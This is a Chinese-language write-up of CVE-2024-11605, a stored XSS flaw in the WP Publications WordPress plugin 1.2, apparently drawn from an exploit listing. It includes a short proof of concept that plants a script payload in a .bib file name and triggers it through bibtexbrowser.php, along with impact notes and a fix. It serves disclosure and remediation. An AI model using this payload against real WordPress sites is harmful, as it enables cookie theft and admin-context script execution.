WP Publications WordPress插件1.2版本存储型XSS漏洞利用详解

本文详细分析了WP Publications WordPress插件1.2版本存在的存储型跨站脚本漏洞(CVE-2024-11605),包括漏洞详情、利用步骤、影响范围和修复建议,为WordPress管理员提供重要的安全防护参考。

Exploit for WP Publications WordPress Plugin 1.2 - Stored XSS CVE-2024-11605

漏洞详情

WordPress的WP Publications插件(版本<=1.2)存在**存储型跨站脚本(XSS)**漏洞。该漏洞的产生原因是插件在将文件名输出到HTML之前未能进行转义处理,使得高权限用户(如管理员)能够注入任意JavaScript代码。

即使在WordPress配置中禁用了unfiltered_html功能(例如多站点设置),此漏洞仍然可被利用。


概念验证(PoC)

  1. 通过SSH连接到服务器并导航到插件目录:

    1
    
    cd /var/www/html/wp-content/plugins/wp-publications/
    
  2. 运行以下命令创建恶意的BibTeX文件:

    1
    
    touch "<img src=x onerror=alert('XSS')>.bib"
    
  3. 通过以下URL访问插件的BibTeX浏览器:

    1
    
    https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
    
  4. 注入的JavaScript代码将被执行,触发XSS载荷:

    1
    
    alert('XSS');
    

影响范围

  • 存储型XSS(JavaScript)在管理面板上下文中执行
  • 在多站点环境中绕过unfiltered_html保护
  • 可用于权限提升、cookie窃取或注入恶意内容

修复建议

更新到能够正确转义文件名后再输出的插件版本。如果没有可用更新,请禁用插件或手动清理文件输入。


参考链接

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计